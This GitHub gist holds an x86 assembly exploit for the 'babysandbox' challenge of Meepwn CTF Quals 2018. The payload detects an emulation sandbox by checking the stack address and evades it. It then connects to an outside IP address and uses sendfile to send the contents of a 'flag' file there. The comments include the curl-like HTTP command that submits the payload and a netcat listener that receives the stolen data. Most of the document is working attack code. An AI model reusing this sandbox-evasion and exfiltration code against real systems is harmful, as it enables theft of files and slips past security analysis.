Created
July 19, 2018 18:16
-
-
Save lenerd/35de7985c3490725266f147d1a32d277 to your computer and use it in GitHub Desktop.
Meepwn CTF Quals 2018: babysandbox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit for the "babysandbox" challenge of the Meepwn CTF 2018. | |
# Written by lenerd for Cyclopropenylidene. | |
# You can assemble the payload via | |
# rasm2 -b32 -f exploit.s -B | base64 -w 0 | |
# or use | |
# gcc -m32 exploit.s -nostdlib | |
# to build a standalone ELF executable. | |
# # Send the payload to the challenge: | |
# $ http --session /tmp/baby.json -v POST http://178.128.100.75/exploit payload=$(rasm2 -b32 -f exploit.s -B | base64 -w 0) | |
# | |
# # Wait for a connection on the server: | |
# $ nc -vkl 16962 | |
# Listening on [0.0.0.0] (family 0, port 16962) | |
# Connection from 178.128.100.75 42090 received! | |
# MeePwnCTF{Unicorn_Engine_Is_So_Good_But_Not_Perfect} | |
.intel_syntax noprefix | |
.globl _start | |
_start: | |
# Fool the sandbox: | |
# If the code is emulated, the stack is always located at 0x1200000. The | |
# emulation is stopped if any interrupt different from 0x80 is encountered. | |
cmp esp, 0x1200000 | |
jne continue | |
int 0x42 | |
continue: | |
# In Linux x86 (32bit) there is only a single syscall `socketcall` (no. 0x66) | |
# for all socket operations. ebx and ecx are expected to contain an integer | |
# specifying the function and a pointer to the arguments, respectively. | |
# socket(AF_INET, SOCK_STREAM, IPPROTO_IP) | |
mov eax, 0x66 | |
mov ebx, 1 # SYS_SOCKET | |
push 0 # IPPROTO_IP | |
push 1 # 1 = SOCK_STREAM, 2 = SOCK_DGRAM | |
push 2 # AF_INET | |
mov ecx, esp | |
int 0x80 | |
mov edi, eax # store sockfd in edi | |
# connect(sockfd, addr, addrlen) | |
mov eax, 0x66 | |
mov ebx, 3 # SYS_CONNECT | |
# Construct struct sockaddr_in on the stack. | |
push 0 | |
push 0 | |
; push 0x0100007f # HOST = 127.0.0.1 | |
push 0x5cd180b2 # HOST = 178.128.209.92 | |
push 0x42420002 # PORT = 0x4242 | AF_INET = 2 | |
mov edx, esp | |
push 16 # addrlen | |
push edx # addr | |
push edi # sockfd | |
mov ecx, esp | |
int 0x80 | |
# open("flag", 0, 0) | |
mov eax, 0x5 | |
mov ecx, 0 | |
mov edx, 0 | |
# "flag" | |
push 0x00000000 | |
push 0x67616c66 | |
mov ebx, esp | |
int 0x80 | |
mov esi, eax # store filefd in esi | |
# sendfile(out_fd, in_fd, offset, count) | |
mov eax, 0xbb | |
mov ebx, edi # outfd = sockfd | |
mov ecx, esi # infd = filefd | |
mov edx, 0 # offset = 0 | |
mov esi, 256 # count = 256 | |
int 0x80 | |
# exit(0) | |
mov eax, 1 | |
mov ebx, 0 | |
int 0x80 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Exploit for the babysandbox challenge of Meepwn CTF Quals 2018 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment